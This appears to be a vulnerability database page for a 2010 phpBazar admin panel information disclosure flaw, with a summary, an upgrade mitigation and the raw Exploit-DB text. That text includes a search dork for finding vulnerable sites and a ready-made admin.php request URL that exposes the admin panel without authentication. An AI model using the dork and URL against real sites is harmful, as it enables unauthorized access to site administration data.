header-logo
Suggest Exploit
vendor:
phpBazar
by:
Net_Spy
8,8
CVSS
HIGH
phpBazar admin information discloser
N/A
CWE
Product Name: phpBazar
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

phpBazar admin information discloser Vulnerability

phpBazar is vulnerable to an information discloser vulnerability. This vulnerability allows an attacker to view the admin panel of the website without authentication. This vulnerability is caused due to the improper validation of the ‘action’ parameter in the ‘admin.php’ script. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable script.

Mitigation:

Upgrade to the latest version of phpBazar.
Source

Exploit-DB raw data:

=====================================
phpBazar admin information discloser Vulnerability
=====================================

Author                 :: Net_Spy
Group                  :: Aras cyber Army
Email                  :: tvc82_2002@yahoo.com
Discover               :: 1 july 2010
Critical Lvl           :: M
Published              :: 22 july 2010
Vendor                 :: http://www.smartisoft.com/
---------------------------------------------------------------------------
~~~~~~~~~

Dork                   :: intitle: phpBazar-AdminPanel

~~~~~~~~~~~~~~~~~~

demo                   :: http://www.target.com/admin/admin.php?action=logging&orders=userid&sort=asc&offset=0&poffset=0
                         

~~~~~~~~~~~~~~~~~~~~~~~~~

Example Just For Edu   :: http://www.site.com/admin/admin.php?action=logging&orders=userid&sort=asc&offset=0&poffset=0
             
              
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+++++++++++++++++++++++++++++++++++++++
[!] greetiz to ::
    DrgPxX,D3stan,hackfaz,hamed.err000r,Net_Spy,jawadn
    All aras cyber amry members
   
+++++++++++++++++++++++++++++++++++++++